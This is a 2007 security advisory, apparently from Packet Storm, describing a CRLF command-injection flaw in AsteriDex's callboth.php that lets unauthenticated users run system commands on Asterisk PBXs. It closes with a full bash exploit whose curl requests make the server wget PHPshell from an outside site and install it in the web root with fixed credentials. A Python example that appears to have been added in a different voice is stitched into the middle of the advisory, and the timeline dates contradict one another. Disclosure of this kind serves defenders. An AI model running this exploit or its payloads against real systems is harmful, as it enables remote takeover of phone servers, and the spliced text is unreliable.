asteridex-exec.txt

07 Jul 2007 | Reported by Carl Livitt | Type: packetstorm | Source: packetstormsecurity.com

AsteriDex command execution vulnerability in Asterisk PB

_______________________________________________________________________________
  
Hoku Security   
  
Vulnerability Advisory  
_______________________________________________________________________________  
  
  
Title: AsteriDex remote command execution  
Vendor URL: http://bestof.nerdvittles.com/applications/asteridex/  
Type: Command injection / remote code execution  
Vulnerable versions: <= 3.0
Risk factor: High  
Popularity: Low  
Author: Carl Livitt  
Contact: [email protected]  
Date: 25th June, 2007  
Location: http://www.hoku.co.uk/advisories/asteridex.txt  
  
  
_______________________________________________________________________________  
  
Description:  
  
  
AsteriDex is a digital rolodex for Asterisk / Trixbox PBXs. There is a  
command injection vulnerability which allows unauthenticated users to   
execute arbitrary commands on the Asterisk management console. Such  
access permits execution of arbitrary operating system commands as the  
'asterisk' user.  
  
The software is vulnerable in its default configuration.  
  
  
_______________________________________________________________________________  
  
Details:  
  
  
The script 'callboth.php' is used by AsteriDex to bridge a VOIP call  
between two end-points. Insufficient parameter checking is done on the  
variables IN and OUT, allowing a malicious user to inject arbitrary  
commands into the Asterisk management console.   
  
The script works by logging into the console server on port 5038/TCP   
on localhost. It then issues an 'Action: Originate' command which is   
used to setup the bridged call. The relevant code from callboth.php is:  
  
fputs ($fp, "Action: login\r\n");  
fputs ($fp, "Username: phpagi\r\n");  
fputs ($fp, "Secret: phpagi\r\n");  
fputs ($fp, "Events: off\r\n\r\n");  
sleep(1) ;  
fputs ($fp, "Action: Originate\r\n");  
fputs ($fp, "Channel: $IN\r\n"); << Command injection  
fputs ($fp, "Context: custom-callboth\r\n");  
fputs ($fp, "Exten: $OUT\r\n"); << Command injection  
fputs ($fp, "Priority: 1\r\n\r\n");  
  
$IN is set from $_GET['IN'] with no sanity checking other than a test of  
string length; all strings passed to $IN must be less than 100 chars,  
including the string 'sip/' which is prepended to $IN prior to the length  
check.  
  
Given sane values of $IN=123, $OUT=321 and $CallerID=567, the session would
look like this:
  
Action: login  
Username: phpagi  
Secret: phpagi  
Events: off  
  
Action: Originate  
Channel: 123  
Context: custom-callboth  
Exten: 321  
Priority: 1  
  
By including CRLF characters in $IN, an attacker can inject arbitrary
commands into the data stream, hijacking the authenticated session to run
commands of the attacker's choice. Take, for example, a $IN string containing:
  
[email protected]\r\nApplication: System\r\nData: echo pwn3d > /tmp/hoku.txt\r\n  
  
This would transform the session into:  
  
Action: login  
Username: phpagi  
Secret: phpagi  
Events: off  
  
Action: Originate  
Channel: [email protected]  
Application: System  
Data: echo pwn3d > /tmp/hoku.txt  
  
Context: custom-callboth  
Exten: 321  
Priority: 1  
  
This would use the call manager's 'System' functionality to execute user-  
supplied operating system commands, in this case writing the word "pwn3d" to a  
file called "/tmp/hoku.txt". The rest of the session would fail because the   
attacker has subverted the original 'Action', rendering the remaining commands   
meaningless to the manager.  
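The injection and its fix as an added Python example (not AsteriDex's own code, which is PHP): it builds the Originate frame with the unchecked interpolation quoted above, parses the result as the manager would, and then shows the field validation callboth.php lacks; the allow-list regex and the 1234@sip.example value are assumptions.

```python
import re

# Added example, not AsteriDex code: builds the AMI 'Originate' frame the way
# callboth.php does, then parses it as the manager would, so the effect of a
# CR/LF in $IN is visible. Allow-list regex and sample values are assumptions.
AMI_VALUE_RE = re.compile(r"[A-Za-z0-9@._+/-]+")  # assumed allow-list for channel/exten
MAX_IN_LEN = 100  # callboth.php limit on $IN, 'sip/' prefix included

# Constructed payload in the shape the advisory describes (not a real host).
INJECTED_IN = ("1234@sip.example\r\nApplication: System\r\n"
               "Data: echo pwn3d > /tmp/hoku.txt\r\n")

def naive_originate(in_value, out_value):
    """Mirror of the vulnerable code: values are interpolated unchecked."""
    return ("Action: Originate\r\n" f"Channel: {in_value}\r\n"
            "Context: custom-callboth\r\n" f"Exten: {out_value}\r\n"
            "Priority: 1\r\n\r\n")

def validate_field(name, value, max_len=MAX_IN_LEN):
    """Reject values that carry a header separator or break the allow-list."""
    if "\r" in value or "\n" in value:
        raise ValueError(f"{name}: CR/LF not allowed")
    if len(value) >= max_len or not AMI_VALUE_RE.fullmatch(value):
        raise ValueError(f"{name}: too long or disallowed characters")
    return value

def safe_originate(in_value, out_value):
    """Hardened variant: validate each field before it reaches the frame."""
    channel = validate_field("IN", "sip/" + in_value)
    exten = validate_field("OUT", out_value)
    if not exten.isdigit():
        raise ValueError("OUT: extension must be numeric")
    return naive_originate(channel, exten)  # safe now that both values are clean

def parse_ami_frame(frame):
    """Split a frame into (key, value) headers; a blank line ends the action."""
    headers = []
    for line in frame.split("\r\n"):
        if not line:
            break
        key, _, value = line.partition(": ")
        headers.append((key, value))
    return headers

def accepts(in_value, out_value):
    """True when the hardened builder accepts the pair, False when it rejects."""
    try:
        safe_originate(in_value, out_value)
        return True
    except ValueError:
        return False
```

Parsing the naive frame shows the manager reading Application and Data as its own headers and stopping at the blank line the payload introduces, which is exactly why the remaining Context/Exten/Priority lines are ignored.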
  
  
______________________________________________________________________________  
  
Updated Versions:  
  
  
A patched version of AsteriDex is available from:  
  
http://bestof.nerdvittles.com/applications/asteridex/  
  
  
_______________________________________________________________________________  
  
Timeline:  
  
  
mm/dd/yyyy  
----------  
06/25/2007 Vendor contacted.  
06/03/2007 Vendor contacted again, response received.  
Details sent to vendor.  
06/03/2007 Patch issued and updated version available.  
06/05/2007 Advisory released.  
  
  
_______________________________________________________________________________  
  
Hoku Security:  
  
Our aim is to give you the business assurance that you require in order to   
maintain a secure company infrastructure. With clients across the globe in the   
UK and USA, we understand the threats posed to your business and provide best of   
breed consulting and solutions to secure your interests and protect your bottom   
line.  
  
Visit http://www.hoku.co.uk for more information and contact details.  
  
_______________________________________________________________________________  
  
Exploit:  
  
  
A proof of concept is provided. It downloads PHPshell, installs it into the root   
of the vulnerable Asterisk server's web directory and sets a username/password of  
trixbox/trixbox. It obeys the 100 char max restriction.  
  
##   
## Begin exploit  
##  
#!/bin/bash  
  
echo Asteridex PoC Exploit (callboth.php vulnerability)  
echo By Carl Livitt / Hoku Security / June 2007  
echo   
  
# This has to be (a) a valid SIP address, and (b) must answer when dialled.  
# The exploit will fail without these conditions being met.  
# Currently uses the Melonite SIP echo test service.  
SIP="[email protected]"  
  
# Magic number, don't change. The default installation of AsteriDex checks  
# for this number and fails without it.  
SEQ=654321  
  
# Other stuff we need  
LOC=/asteridex/callboth.php  
OUT=123456  
  
# Sanity  
if [ "$1X" == "X" ]; then  
echo Syntax: $0 \<Host IP\[:port\]\>  
echo For example: $0 www.example.com:8080  
exit 1  
fi  
  
# Insanity  
echo "[-] Exploiting host $1 - please wait"  
echo -n '[+]' Building shell script  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20\!/bin/sh>/tmp/t%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20wget%20%2dO%20x.tar.bz2%20%5c%27http://%3e%3e/tmp/t%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20prdownloads.sf.net/phpshell/%3e%3e/tmp/t%0d%0a" &>/dev/null  
echo .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20phpshell%2d2.1.tar.bz2%3fdownload%5c%27%3e%3e/tmp/t%0d%0a" &>/dev/null  
echo '[+] Executing shell script'  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp;chmod%20%2bx%20t;./t;tar%20jxf%20x.tar.bz2%0d%0a" &>/dev/null  
echo -n '[+] Setting up phpshell'  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp;mv%20phpshell-2.1%20p%0d%0a" &>/dev/null
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp/p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp/p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0d%0a" &>/dev/null  
echo .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20mv%20/tmp/p%20/var/www/html/phpshell%0d%0a" &>/dev/null  
  
# Have a nice day  
echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php"  
echo You can login with the username \'trixbox\' and password \'trixbox\'  
  
##  
## End Exploit  
##  